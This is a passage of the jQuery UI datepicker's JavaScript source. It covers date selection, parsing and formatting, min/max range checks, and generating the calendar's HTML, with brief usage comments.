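 * user code goes through the "setDate" command instead, e.g. (hypothetical
 * selector and date):
 *
 *   $("#date").datepicker("setDate", new Date(2016, 3 - 1, 14)); // 14 March 2016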
*/ _selectDay: function(id, month, year, td) { var inst, target = $(id); if ($(td).hasClass(this._unselectableClass) || this._isDisabledDatepicker(target[0])) { return; } inst = this._getInst(target[0]); inst.selectedDay = inst.currentDay = $("a", td).html(); inst.selectedMonth = inst.currentMonth = month; inst.selectedYear = inst.currentYear = year; this._selectDate(id, this._formatDate(inst, inst.currentDay, inst.currentMonth, inst.currentYear)); }, /* Erase the input field and hide the date picker. */ _clearDate: function(id) { var target = $(id); this._selectDate(target, ""); }, /* Update the input field with the selected date. */ _selectDate: function(id, dateStr) { var onSelect, target = $(id), inst = this._getInst(target[0]); dateStr = (dateStr != null ? dateStr : this._formatDate(inst)); if (inst.input) { inst.input.val(dateStr); } this._updateAlternate(inst); onSelect = this._get(inst, "onSelect"); if (onSelect) { onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]); // trigger custom callback } else if (inst.input) { inst.input.trigger("change"); // fire the change event } if (inst.inline){ this._updateDatepicker(inst); } else { this._hideDatepicker(); this._lastInput = inst.input[0]; if (typeof(inst.input[0]) !== "object") { inst.input.focus(); // restore focus } this._lastInput = null; } }, /* Update any alternate field to synchronise with the main field. */ _updateAlternate: function(inst) { var altFormat, date, dateStr, altField = this._get(inst, "altField"); if (altField) { // update alternate field too altFormat = this._get(inst, "altFormat") || this._get(inst, "dateFormat"); date = this._getDate(inst); dateStr = this.formatDate(altFormat, date, this._getFormatConfig(inst)); $(altField).each(function() { $(this).val(dateStr); }); } }, /* Set as beforeShowDay function to prevent selection of weekends. * @param date Date - the date to customise * @return [boolean, string] - is this date selectable?, what is its CSS class? */ noWeekends: function(date) { var day = date.getDay(); return [(day > 0 && day < 6), ""]; }, /* Set as calculateWeek to determine the week of the year based on the ISO 8601 definition. * @param date Date - the date to get the week for * @return number - the number of the week within the year that contains this date */ iso8601Week: function(date) { var time, checkDate = new Date(date.getTime()); // Find Thursday of this week starting on Monday checkDate.setDate(checkDate.getDate() + 4 - (checkDate.getDay() || 7)); time = checkDate.getTime(); checkDate.setMonth(0); // Compare with Jan 1 checkDate.setDate(1); return Math.floor(Math.round((time - checkDate) / 86400000) / 7) + 1; }, /* Parse a string value into a date object. * See formatDate below for the possible formats. * * @param format string - the expected format of the date * @param value string - the date in the above format * @param settings Object - attributes include: * shortYearCutoff number - the cutoff year for determining the century (optional) * dayNamesShort string[7] - abbreviated names of the days from Sunday (optional) * dayNames string[7] - names of the days from Sunday (optional) * monthNamesShort string[12] - abbreviated names of the months (optional) * monthNames string[12] - names of the months (optional) * @return Date - the extracted date value or null if value is blank */ parseDate: function (format, value, settings) { if (format == null || value == null) { throw "Invalid arguments"; } value = (typeof value === "object" ? 
value.toString() : value + ""); if (value === "") { return null; } var iFormat, dim, extra, iValue = 0, shortYearCutoffTemp = (settings ? settings.shortYearCutoff : null) || this._defaults.shortYearCutoff, shortYearCutoff = (typeof shortYearCutoffTemp !== "string" ? shortYearCutoffTemp : new Date().getFullYear() % 100 + parseInt(shortYearCutoffTemp, 10)), dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort, dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames, monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort, monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames, year = -1, month = -1, day = -1, doy = -1, literal = false, date, // Check whether a format character is doubled lookAhead = function(match) { var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match); if (matches) { iFormat++; } return matches; }, // Extract a number from the string value getNumber = function(match) { var isDoubled = lookAhead(match), size = (match === "@" ? 14 : (match === "!" ? 20 : (match === "y" && isDoubled ? 4 : (match === "o" ? 3 : 2)))), minSize = (match === "y" ? size : 1), digits = new RegExp("^\\d{" + minSize + "," + size + "}"), num = value.substring(iValue).match(digits); if (!num) { throw "Missing number at position " + iValue; } iValue += num[0].length; return parseInt(num[0], 10); }, // Extract a name from the string value and convert to an index getName = function(match, shortNames, longNames) { var index = -1, names = $.map(lookAhead(match) ? longNames : shortNames, function (v, k) { return [ [k, v] ]; }).sort(function (a, b) { return -(a[1].length - b[1].length); }); $.each(names, function (i, pair) { var name = pair[1]; if (value.substr(iValue, name.length).toLowerCase() === name.toLowerCase()) { index = pair[0]; iValue += name.length; return false; } }); if (index !== -1) { return index + 1; } else { throw "Unknown name at position " + iValue; } }, // Confirm that a literal character matches the string value checkLiteral = function() { if (value.charAt(iValue) !== format.charAt(iFormat)) { throw "Unexpected literal at position " + iValue; } iValue++; }; for (iFormat = 0; iFormat < format.length; iFormat++) { if (literal) { if (format.charAt(iFormat) === "'" && !lookAhead("'")) { literal = false; } else { checkLiteral(); } } else { switch (format.charAt(iFormat)) { case "d": day = getNumber("d"); break; case "D": getName("D", dayNamesShort, dayNames); break; case "o": doy = getNumber("o"); break; case "m": month = getNumber("m"); break; case "M": month = getName("M", monthNamesShort, monthNames); break; case "y": year = getNumber("y"); break; case "@": date = new Date(getNumber("@")); year = date.getFullYear(); month = date.getMonth() + 1; day = date.getDate(); break; case "!": date = new Date((getNumber("!") - this._ticksTo1970) / 10000); year = date.getFullYear(); month = date.getMonth() + 1; day = date.getDate(); break; case "'": if (lookAhead("'")){ checkLiteral(); } else { literal = true; } break; default: checkLiteral(); } } } if (iValue < value.length){ extra = value.substr(iValue); if (!/^\s+/.test(extra)) { throw "Extra/unparsed characters found in date: " + extra; } } if (year === -1) { year = new Date().getFullYear(); } else if (year < 100) { year += new Date().getFullYear() - new Date().getFullYear() % 100 + (year <= shortYearCutoff ? 
0 : -100); } if (doy > -1) { month = 1; day = doy; do { dim = this._getDaysInMonth(year, month - 1); if (day <= dim) { break; } month++; day -= dim; } while (true); } date = this._daylightSavingAdjust(new Date(year, month - 1, day)); if (date.getFullYear() !== year || date.getMonth() + 1 !== month || date.getDate() !== day) { throw "Invalid date"; // E.g. 31/02/00 } return date; }, /* Standard date formats. */ ATOM: "yy-mm-dd", // RFC 3339 (ISO 8601) COOKIE: "D, dd M yy", ISO_8601: "yy-mm-dd", RFC_822: "D, d M y", RFC_850: "DD, dd-M-y", RFC_1036: "D, d M y", RFC_1123: "D, d M yy", RFC_2822: "D, d M yy", RSS: "D, d M y", // RFC 822 TICKS: "!", TIMESTAMP: "@", W3C: "yy-mm-dd", // ISO 8601 _ticksTo1970: (((1970 - 1) * 365 + Math.floor(1970 / 4) - Math.floor(1970 / 100) + Math.floor(1970 / 400)) * 24 * 60 * 60 * 10000000), /* Format a date object into a string value. * The format can be combinations of the following: * d - day of month (no leading zero) * dd - day of month (two digit) * o - day of year (no leading zeros) * oo - day of year (three digit) * D - day name short * DD - day name long * m - month of year (no leading zero) * mm - month of year (two digit) * M - month name short * MM - month name long * y - year (two digit) * yy - year (four digit) * @ - Unix timestamp (ms since 01/01/1970) * ! - Windows ticks (100ns since 01/01/0001) * "..." - literal text * '' - single quote * * @param format string - the desired format of the date * @param date Date - the date value to format * @param settings Object - attributes include: * dayNamesShort string[7] - abbreviated names of the days from Sunday (optional) * dayNames string[7] - names of the days from Sunday (optional) * monthNamesShort string[12] - abbreviated names of the months (optional) * monthNames string[12] - names of the months (optional) * @return string - the date in the above format */ formatDate: function (format, date, settings) { if (!date) { return ""; } var iFormat, dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort, dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames, monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort, monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames, // Check whether a format character is doubled lookAhead = function(match) { var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match); if (matches) { iFormat++; } return matches; }, // Format a number, with leading zero if necessary formatNumber = function(match, value, len) { var num = "" + value; if (lookAhead(match)) { while (num.length < len) { num = "0" + num; } } return num; }, // Format a name, short or long as requested formatName = function(match, value, shortNames, longNames) { return (lookAhead(match) ? 
longNames[value] : shortNames[value]); }, output = "", literal = false; if (date) { for (iFormat = 0; iFormat < format.length; iFormat++) { if (literal) { if (format.charAt(iFormat) === "'" && !lookAhead("'")) { literal = false; } else { output += format.charAt(iFormat); } } else { switch (format.charAt(iFormat)) { case "d": output += formatNumber("d", date.getDate(), 2); break; case "D": output += formatName("D", date.getDay(), dayNamesShort, dayNames); break; case "o": output += formatNumber("o", Math.round((new Date(date.getFullYear(), date.getMonth(), date.getDate()).getTime() - new Date(date.getFullYear(), 0, 0).getTime()) / 86400000), 3); break; case "m": output += formatNumber("m", date.getMonth() + 1, 2); break; case "M": output += formatName("M", date.getMonth(), monthNamesShort, monthNames); break; case "y": output += (lookAhead("y") ? date.getFullYear() : (date.getYear() % 100 < 10 ? "0" : "") + date.getYear() % 100); break; case "@": output += date.getTime(); break; case "!": output += date.getTime() * 10000 + this._ticksTo1970; break; case "'": if (lookAhead("'")) { output += "'"; } else { literal = true; } break; default: output += format.charAt(iFormat); } } } } return output; }, /* Extract all possible characters from the date format. */ _possibleChars: function (format) { var iFormat, chars = "", literal = false, // Check whether a format character is doubled lookAhead = function(match) { var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match); if (matches) { iFormat++; } return matches; }; for (iFormat = 0; iFormat < format.length; iFormat++) { if (literal) { if (format.charAt(iFormat) === "'" && !lookAhead("'")) { literal = false; } else { chars += format.charAt(iFormat); } } else { switch (format.charAt(iFormat)) { case "d": case "m": case "y": case "@": chars += "0123456789"; break; case "D": case "M": return null; // Accept anything case "'": if (lookAhead("'")) { chars += "'"; } else { literal = true; } break; default: chars += format.charAt(iFormat); } } } return chars; }, /* Get a setting value, defaulting if necessary. */ _get: function(inst, name) { return inst.settings[name] !== undefined ? inst.settings[name] : this._defaults[name]; }, /* Parse existing date and initialise date picker. */ _setDateFromField: function(inst, noDefault) { if (inst.input.val() === inst.lastVal) { return; } var dateFormat = this._get(inst, "dateFormat"), dates = inst.lastVal = inst.input ? inst.input.val() : null, defaultDate = this._getDefaultDate(inst), date = defaultDate, settings = this._getFormatConfig(inst); try { date = this.parseDate(dateFormat, dates, settings) || defaultDate; } catch (event) { dates = (noDefault ? "" : dates); } inst.selectedDay = date.getDate(); inst.drawMonth = inst.selectedMonth = date.getMonth(); inst.drawYear = inst.selectedYear = date.getFullYear(); inst.currentDay = (dates ? date.getDate() : 0); inst.currentMonth = (dates ? date.getMonth() : 0); inst.currentYear = (dates ? date.getFullYear() : 0); this._adjustInstDate(inst); }, /* Retrieve the default date shown on opening. */ _getDefaultDate: function(inst) { return this._restrictMinMax(inst, this._determineDate(inst, this._get(inst, "defaultDate"), new Date())); }, /* A date may be specified as an exact value or a relative one. 
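 * Relative strings combine signed numbers with period letters - d/D (days),
 * w/W (weeks), m/M (months), y/Y (years) - and may be prefixed with "c" to
 * count from the currently shown date. For example (hypothetical selector):
 *
 *   $("#date").datepicker("option", "minDate", "-1m");      // one month back
 *   $("#date").datepicker("option", "maxDate", "+1m +10d"); // ~six weeks ahead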
*/ _determineDate: function(inst, date, defaultDate) { var offsetNumeric = function(offset) { var date = new Date(); date.setDate(date.getDate() + offset); return date; }, offsetString = function(offset) { try { return $.datepicker.parseDate($.datepicker._get(inst, "dateFormat"), offset, $.datepicker._getFormatConfig(inst)); } catch (e) { // Ignore } var date = (offset.toLowerCase().match(/^c/) ? $.datepicker._getDate(inst) : null) || new Date(), year = date.getFullYear(), month = date.getMonth(), day = date.getDate(), pattern = /([+\-]?[0-9]+)\s*(d|D|w|W|m|M|y|Y)?/g, matches = pattern.exec(offset); while (matches) { switch (matches[2] || "d") { case "d" : case "D" : day += parseInt(matches[1],10); break; case "w" : case "W" : day += parseInt(matches[1],10) * 7; break; case "m" : case "M" : month += parseInt(matches[1],10); day = Math.min(day, $.datepicker._getDaysInMonth(year, month)); break; case "y": case "Y" : year += parseInt(matches[1],10); day = Math.min(day, $.datepicker._getDaysInMonth(year, month)); break; } matches = pattern.exec(offset); } return new Date(year, month, day); }, newDate = (date == null || date === "" ? defaultDate : (typeof date === "string" ? offsetString(date) : (typeof date === "number" ? (isNaN(date) ? defaultDate : offsetNumeric(date)) : new Date(date.getTime())))); newDate = (newDate && newDate.toString() === "Invalid Date" ? defaultDate : newDate); if (newDate) { newDate.setHours(0); newDate.setMinutes(0); newDate.setSeconds(0); newDate.setMilliseconds(0); } return this._daylightSavingAdjust(newDate); }, /* Handle switch to/from daylight saving. * Hours may be non-zero on daylight saving cut-over: * > 12 when midnight changeover, but then cannot generate * midnight datetime, so jump to 1AM, otherwise reset. * @param date (Date) the date to check * @return (Date) the corrected date */ _daylightSavingAdjust: function(date) { if (!date) { return null; } date.setHours(date.getHours() > 12 ? date.getHours() + 2 : 0); return date; }, /* Set the date(s) directly. */ _setDate: function(inst, date, noChange) { var clear = !date, origMonth = inst.selectedMonth, origYear = inst.selectedYear, newDate = this._restrictMinMax(inst, this._determineDate(inst, date, new Date())); inst.selectedDay = inst.currentDay = newDate.getDate(); inst.drawMonth = inst.selectedMonth = inst.currentMonth = newDate.getMonth(); inst.drawYear = inst.selectedYear = inst.currentYear = newDate.getFullYear(); if ((origMonth !== inst.selectedMonth || origYear !== inst.selectedYear) && !noChange) { this._notifyChange(inst); } this._adjustInstDate(inst); if (inst.input) { inst.input.val(clear ? "" : this._formatDate(inst)); } }, /* Retrieve the date(s) directly. */ _getDate: function(inst) { var startDate = (!inst.currentYear || (inst.input && inst.input.val() === "") ? null : this._daylightSavingAdjust(new Date( inst.currentYear, inst.currentMonth, inst.currentDay))); return startDate; }, /* Attach the onxxx handlers. These are declared statically so * they work with static code transformers like Caja. 
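 * The generated markup carries matching data-handler/data-event attributes
 * that this method wires up - an illustrative fragment, not literal output:
 *
 *   <a class="ui-datepicker-next" data-handler="next" data-event="click">Next</a>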
*/ _attachHandlers: function(inst) { var stepMonths = this._get(inst, "stepMonths"), id = "#" + inst.id.replace( /\\\\/g, "\\" ); inst.dpDiv.find("[data-handler]").map(function () { var handler = { prev: function () { $.datepicker._adjustDate(id, -stepMonths, "M"); }, next: function () { $.datepicker._adjustDate(id, +stepMonths, "M"); }, hide: function () { $.datepicker._hideDatepicker(); }, today: function () { $.datepicker._gotoToday(id); }, selectDay: function () { $.datepicker._selectDay(id, +this.getAttribute("data-month"), +this.getAttribute("data-year"), this); return false; }, selectMonth: function () { $.datepicker._selectMonthYear(id, this, "M"); return false; }, selectYear: function () { $.datepicker._selectMonthYear(id, this, "Y"); return false; } }; $(this).bind(this.getAttribute("data-event"), handler[this.getAttribute("data-handler")]); }); }, /* Generate the HTML for the current state of the date picker. */ _generateHTML: function(inst) { var maxDraw, prevText, prev, nextText, next, currentText, gotoDate, controls, buttonPanel, firstDay, showWeek, dayNames, dayNamesMin, monthNames, monthNamesShort, beforeShowDay, showOtherMonths, selectOtherMonths, defaultDate, html, dow, row, group, col, selectedDate, cornerClass, calender, thead, day, daysInMonth, leadDays, curRows, numRows, printDate, dRow, tbody, daySettings, otherMonth, unselectable, tempDate = new Date(), today = this._daylightSavingAdjust( new Date(tempDate.getFullYear(), tempDate.getMonth(), tempDate.getDate())), // clear time isRTL = this._get(inst, "isRTL"), showButtonPanel = this._get(inst, "showButtonPanel"), hideIfNoPrevNext = this._get(inst, "hideIfNoPrevNext"), navigationAsDateFormat = this._get(inst, "navigationAsDateFormat"), numMonths = this._getNumberOfMonths(inst), showCurrentAtPos = this._get(inst, "showCurrentAtPos"), stepMonths = this._get(inst, "stepMonths"), isMultiMonth = (numMonths[0] !== 1 || numMonths[1] !== 1), currentDate = this._daylightSavingAdjust((!inst.currentDay ? new Date(9999, 9, 9) : new Date(inst.currentYear, inst.currentMonth, inst.currentDay))), minDate = this._getMinMaxDate(inst, "min"), maxDate = this._getMinMaxDate(inst, "max"), drawMonth = inst.drawMonth - showCurrentAtPos, drawYear = inst.drawYear; if (drawMonth < 0) { drawMonth += 12; drawYear--; } if (maxDate) { maxDraw = this._daylightSavingAdjust(new Date(maxDate.getFullYear(), maxDate.getMonth() - (numMonths[0] * numMonths[1]) + 1, maxDate.getDate())); maxDraw = (minDate && maxDraw < minDate ? minDate : maxDraw); while (this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1)) > maxDraw) { drawMonth--; if (drawMonth < 0) { drawMonth = 11; drawYear--; } } } inst.drawMonth = drawMonth; inst.drawYear = drawYear; prevText = this._get(inst, "prevText"); prevText = (!navigationAsDateFormat ? prevText : this.formatDate(prevText, this._daylightSavingAdjust(new Date(drawYear, drawMonth - stepMonths, 1)), this._getFormatConfig(inst))); prev = (this._canAdjustMonth(inst, -1, drawYear, drawMonth) ? "<a class='ui-datepicker-prev ui-corner-all' data-handler='prev' data-event='click'" + " title='" + prevText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "e" : "w") + "'>" + prevText + "</span></a>" : (hideIfNoPrevNext ? "" : "<a class='ui-datepicker-prev ui-corner-all ui-state-disabled' title='"+ prevText +"'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "e" : "w") + "'>" + prevText + "</span></a>")); nextText = this._get(inst, "nextText"); nextText = (!navigationAsDateFormat ? 
nextText : this.formatDate(nextText, this._daylightSavingAdjust(new Date(drawYear, drawMonth + stepMonths, 1)), this._getFormatConfig(inst))); next = (this._canAdjustMonth(inst, +1, drawYear, drawMonth) ? "<a class='ui-datepicker-next ui-corner-all' data-handler='next' data-event='click'" + " title='" + nextText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "w" : "e") + "'>" + nextText + "</span></a>" : (hideIfNoPrevNext ? "" : "<a class='ui-datepicker-next ui-corner-all ui-state-disabled' title='"+ nextText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "w" : "e") + "'>" + nextText + "</span></a>")); currentText = this._get(inst, "currentText"); gotoDate = (this._get(inst, "gotoCurrent") && inst.currentDay ? currentDate : today); currentText = (!navigationAsDateFormat ? currentText : this.formatDate(currentText, gotoDate, this._getFormatConfig(inst))); controls = (!inst.inline ? "<button type='button' class='ui-datepicker-close ui-state-default ui-priority-primary ui-corner-all' data-handler='hide' data-event='click'>" + this._get(inst, "closeText") + "</button>" : ""); buttonPanel = (showButtonPanel) ? "<div class='ui-datepicker-buttonpane ui-widget-content'>" + (isRTL ? controls : "") + (this._isInRange(inst, gotoDate) ? "<button type='button' class='ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all' data-handler='today' data-event='click'" + ">" + currentText + "</button>" : "") + (isRTL ? "" : controls) + "</div>" : ""; firstDay = parseInt(this._get(inst, "firstDay"),10); firstDay = (isNaN(firstDay) ? 0 : firstDay); showWeek = this._get(inst, "showWeek"); dayNames = this._get(inst, "dayNames"); dayNamesMin = this._get(inst, "dayNamesMin"); monthNames = this._get(inst, "monthNames"); monthNamesShort = this._get(inst, "monthNamesShort"); beforeShowDay = this._get(inst, "beforeShowDay"); showOtherMonths = this._get(inst, "showOtherMonths"); selectOtherMonths = this._get(inst, "selectOtherMonths"); defaultDate = this._getDefaultDate(inst); html = ""; for (row = 0; row < numMonths[0]; row++) { group = ""; this.maxRows = 4; for (col = 0; col < numMonths[1]; col++) { selectedDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, inst.selectedDay)); cornerClass = " ui-corner-all"; calender = ""; if (isMultiMonth) { calender += "<div class='ui-datepicker-group"; if (numMonths[1] > 1) { switch (col) { case 0: calender += " ui-datepicker-group-first"; cornerClass = " ui-corner-" + (isRTL ? "right" : "left"); break; case numMonths[1]-1: calender += " ui-datepicker-group-last"; cornerClass = " ui-corner-" + (isRTL ? "left" : "right"); break; default: calender += " ui-datepicker-group-middle"; cornerClass = ""; break; } } calender += "'>"; } calender += "<div class='ui-datepicker-header ui-widget-header ui-helper-clearfix" + cornerClass + "'>" + (/all|left/.test(cornerClass) && row === 0 ? (isRTL ? next : prev) : "") + (/all|right/.test(cornerClass) && row === 0 ? (isRTL ? prev : next) : "") + this._generateMonthYearHeader(inst, drawMonth, drawYear, minDate, maxDate, row > 0 || col > 0, monthNames, monthNamesShort) + // draw month headers "</div><table class='ui-datepicker-calendar'><thead>" + "<tr>"; thead = (showWeek ? "<th class='ui-datepicker-week-col'>" + this._get(inst, "weekHeader") + "</th>" : ""); for (dow = 0; dow < 7; dow++) { // days of the week day = (dow + firstDay) % 7; thead += "<th scope='col'" + ((dow + firstDay + 6) % 7 >= 5 ?
" class='ui-datepicker-week-end'" : "") + ">" + "<span title='" + dayNames[day] + "'>" + dayNamesMin[day] + "</span></th>"; } calender += thead + "</tr></thead><tbody>"; daysInMonth = this._getDaysInMonth(drawYear, drawMonth); if (drawYear === inst.selectedYear && drawMonth === inst.selectedMonth) { inst.selectedDay = Math.min(inst.selectedDay, daysInMonth); } leadDays = (this._getFirstDayOfMonth(drawYear, drawMonth) - firstDay + 7) % 7; curRows = Math.ceil((leadDays + daysInMonth) / 7); // calculate the number of rows to generate numRows = (isMultiMonth ? this.maxRows > curRows ? this.maxRows : curRows : curRows); //If multiple months, use the higher number of rows (see #7043) this.maxRows = numRows; printDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1 - leadDays)); for (dRow = 0; dRow < numRows; dRow++) { // create date picker rows calender += "<tr>"; tbody = (!showWeek ? "" : "<td class='ui-datepicker-week-col'>" + this._get(inst, "calculateWeek")(printDate) + "</td>"); for (dow = 0; dow < 7; dow++) { // create date picker days daySettings = (beforeShowDay ? beforeShowDay.apply((inst.input ? inst.input[0] : null), [printDate]) : [true, ""]); otherMonth = (printDate.getMonth() !== drawMonth); unselectable = (otherMonth && !selectOtherMonths) || !daySettings[0] || (minDate && printDate < minDate) || (maxDate && printDate > maxDate); tbody += "<td class='" + ((dow + firstDay + 6) % 7 >= 5 ? " ui-datepicker-week-end" : "") + // highlight weekends (otherMonth ? " ui-datepicker-other-month" : "") + // highlight days from other months ((printDate.getTime() === selectedDate.getTime() && drawMonth === inst.selectedMonth && inst._keyEvent) || // user pressed key (defaultDate.getTime() === printDate.getTime() && defaultDate.getTime() === selectedDate.getTime()) ? // or defaultDate is current printedDate and defaultDate is selectedDate " " + this._dayOverClass : "") + // highlight selected day (unselectable ? " " + this._unselectableClass + " ui-state-disabled": "") + // highlight unselectable days (otherMonth && !showOtherMonths ? "" : " " + daySettings[1] + // highlight custom dates (printDate.getTime() === currentDate.getTime() ? " " + this._currentClass : "") + // highlight selected day (printDate.getTime() === today.getTime() ? " ui-datepicker-today" : "")) + "'" + // highlight today (if different) ((!otherMonth || showOtherMonths) && daySettings[2] ? " title='" + daySettings[2].replace(/'/g, "&#39;") + "'" : "") + // cell title (unselectable ? "" : " data-handler='selectDay' data-event='click' data-month='" + printDate.getMonth() + "' data-year='" + printDate.getFullYear() + "'") + ">" + // actions (otherMonth && !showOtherMonths ? "&#xa0;" : // display for other months (unselectable ? "<span class='ui-state-default'>" + printDate.getDate() + "</span>" : "<a class='ui-state-default" + (printDate.getTime() === today.getTime() ? " ui-state-highlight" : "") + (printDate.getTime() === currentDate.getTime() ? " ui-state-active" : "") + // highlight selected day (otherMonth ? " ui-priority-secondary" : "") + // distinguish dates from other months "' href='#'>" + printDate.getDate() + "</a>")) + "</td>"; // display selectable date printDate.setDate(printDate.getDate() + 1); printDate = this._daylightSavingAdjust(printDate); } calender += tbody + "</tr>"; } drawMonth++; if (drawMonth > 11) { drawMonth = 0; drawYear++; } calender += "</tbody></table>" + (isMultiMonth ? "</div>" + ((numMonths[0] > 0 && col === numMonths[1]-1) ? 
"<div class='ui-datepicker-row-break'></div>" : "") : ""); group += calender; } html += group; } html += buttonPanel; inst._keyEvent = false; return html; }, /* Generate the month and year header. */ _generateMonthYearHeader: function(inst, drawMonth, drawYear, minDate, maxDate, secondary, monthNames, monthNamesShort) { var inMinYear, inMaxYear, month, years, thisYear, determineYear, year, endYear, changeMonth = this._get(inst, "changeMonth"), changeYear = this._get(inst, "changeYear"), showMonthAfterYear = this._get(inst, "showMonthAfterYear"), html = "<div class='ui-datepicker-title'>", monthHtml = ""; // month selection if (secondary || !changeMonth) { monthHtml += "<span class='ui-datepicker-month'>" + monthNames[drawMonth] + "</span>"; } else { inMinYear = (minDate && minDate.getFullYear() === drawYear); inMaxYear = (maxDate && maxDate.getFullYear() === drawYear); monthHtml += "<select class='ui-datepicker-month' data-handler='selectMonth' data-event='change'>"; for ( month = 0; month < 12; month++) { if ((!inMinYear || month >= minDate.getMonth()) && (!inMaxYear || month <= maxDate.getMonth())) { monthHtml += "<option value='" + month + "'" + (month === drawMonth ? " selected='selected'" : "") + ">" + monthNamesShort[month] + "</option>"; } } monthHtml += "</select>"; } if (!showMonthAfterYear) { html += monthHtml + (secondary || !(changeMonth && changeYear) ? "&#xa0;" : ""); } // year selection if ( !inst.yearshtml ) { inst.yearshtml = ""; if (secondary || !changeYear) { html += "<span class='ui-datepicker-year'>" + drawYear + "</span>"; } else { // determine range of years to display years = this._get(inst, "yearRange").split(":"); thisYear = new Date().getFullYear(); determineYear = function(value) { var year = (value.match(/c[+\-].*/) ? drawYear + parseInt(value.substring(1), 10) : (value.match(/[+\-].*/) ? thisYear + parseInt(value, 10) : parseInt(value, 10))); return (isNaN(year) ? thisYear : year); }; year = determineYear(years[0]); endYear = Math.max(year, determineYear(years[1] || "")); year = (minDate ? Math.max(year, minDate.getFullYear()) : year); endYear = (maxDate ? Math.min(endYear, maxDate.getFullYear()) : endYear); inst.yearshtml += "<select class='ui-datepicker-year' data-handler='selectYear' data-event='change'>"; for (; year <= endYear; year++) { inst.yearshtml += "<option value='" + year + "'" + (year === drawYear ? " selected='selected'" : "") + ">" + year + "</option>"; } inst.yearshtml += "</select>"; html += inst.yearshtml; inst.yearshtml = null; } } html += this._get(inst, "yearSuffix"); if (showMonthAfterYear) { html += (secondary || !(changeMonth && changeYear) ? "&#xa0;" : "") + monthHtml; } html += "</div>"; // Close datepicker_header return html; }, /* Adjust one of the date sub-fields. */ _adjustInstDate: function(inst, offset, period) { var year = inst.drawYear + (period === "Y" ? offset : 0), month = inst.drawMonth + (period === "M" ? offset : 0), day = Math.min(inst.selectedDay, this._getDaysInMonth(year, month)) + (period === "D" ? offset : 0), date = this._restrictMinMax(inst, this._daylightSavingAdjust(new Date(year, month, day))); inst.selectedDay = date.getDate(); inst.drawMonth = inst.selectedMonth = date.getMonth(); inst.drawYear = inst.selectedYear = date.getFullYear(); if (period === "M" || period === "Y") { this._notifyChange(inst); } }, /* Ensure a date is within any min/max bounds. 
*/ _restrictMinMax: function(inst, date) { var minDate = this._getMinMaxDate(inst, "min"), maxDate = this._getMinMaxDate(inst, "max"), newDate = (minDate && date < minDate ? minDate : date); return (maxDate && newDate > maxDate ? maxDate : newDate); }, /* Notify change of month/year. */ _notifyChange: function(inst) { var onChange = this._get(inst, "onChangeMonthYear"); if (onChange) { onChange.apply((inst.input ? inst.input[0] : null), [inst.selectedYear, inst.selectedMonth + 1, inst]); } }, /* Determine the number of months to show. */ _getNumberOfMonths: function(inst) { var numMonths = this._get(inst, "numberOfMonths"); return (numMonths == null ? [1, 1] : (typeof numMonths === "number" ? [1, numMonths] : numMonths)); }, /* Determine the current maximum date - ensure no time components are set. */ _getMinMaxDate: function(inst, minMax) { return this._determineDate(inst, this._get(inst, minMax + "Date"), null); }, /* Find the number of days in a given month. */ _getDaysInMonth: function(year, month) { return 32 - this._daylightSavingAdjust(new Date(year, month, 32)).getDate(); }, /* Find the day of the week of the first of a month. */ _getFirstDayOfMonth: function(year, month) { return new Date(year, month, 1).getDay(); }, /* Determines if we should allow a "next/prev" month display change. */ _canAdjustMonth: function(inst, offset, curYear, curMonth) { var numMonths = this._getNumberOfMonths(inst), date = this._daylightSavingAdjust(new Date(curYear, curMonth + (offset < 0 ? offset : numMonths[0] * numMonths[1]), 1)); if (offset < 0) { date.setDate(this._getDaysInMonth(date.getFullYear(), date.getMonth())); } return this._isInRange(inst, date); }, /* Is the given date in the accepted range? */ _isInRange: function(inst, date) { var yearSplit, currentYear, minDate = this._getMinMaxDate(inst, "min"), maxDate = this._getMinMaxDate(inst, "max"), minYear = null, maxYear = null, years = this._get(inst, "yearRange"); if (years){ yearSplit = years.split(":"); currentYear = new Date().getFullYear(); minYear = parseInt(yearSplit[0], 10); maxYear = parseInt(yearSplit[1], 10); if ( yearSplit[0].match(/[+\-].*/) ) { minYear += currentYear; } if ( yearSplit[1].match(/[+\-].*/) ) { maxYear += currentYear; } } return ((!minDate || date.getTime() >= minDate.getTime()) && (!maxDate || date.getTime() <= maxDate.getTime()) && (!minYear || date.getFullYear() >= minYear) && (!maxYear || date.getFullYear() <= maxYear)); }, /* Provide the configuration settings for formatting/parsing. */ _getFormatConfig: function(inst) { var shortYearCutoff = this._get(inst, "shortYearCutoff"); shortYearCutoff = (typeof shortYearCutoff !== "string" ? shortYearCutoff : new Date().getFullYear() % 100 + parseInt(shortYearCutoff, 10)); return {shortYearCutoff: shortYearCutoff, dayNamesShort: this._get(inst, "dayNamesShort"), dayNames: this._get(inst, "dayNames"), monthNamesShort: this._get(inst, "monthNamesShort"), monthNames: this._get(inst, "monthNames")}; }, /* Format the given date for display. */ _formatDate: function(inst, day, month, year) { if (!day) { inst.currentDay = inst.selectedDay; inst.currentMonth = inst.selectedMonth; inst.currentYear = inst.selectedYear; } var date = (day ? (typeof day === "object" ? day : this._daylightSavingAdjust(new Date(year, month, day))) : this._daylightSavingAdjust(new Date(inst.currentYear, inst.currentMonth, inst.currentDay))); return this.formatDate(this._get(inst, "dateFormat"), date, this._getFormatConfig(inst)); } }); /* * Bind hover events for datepicker elements. 
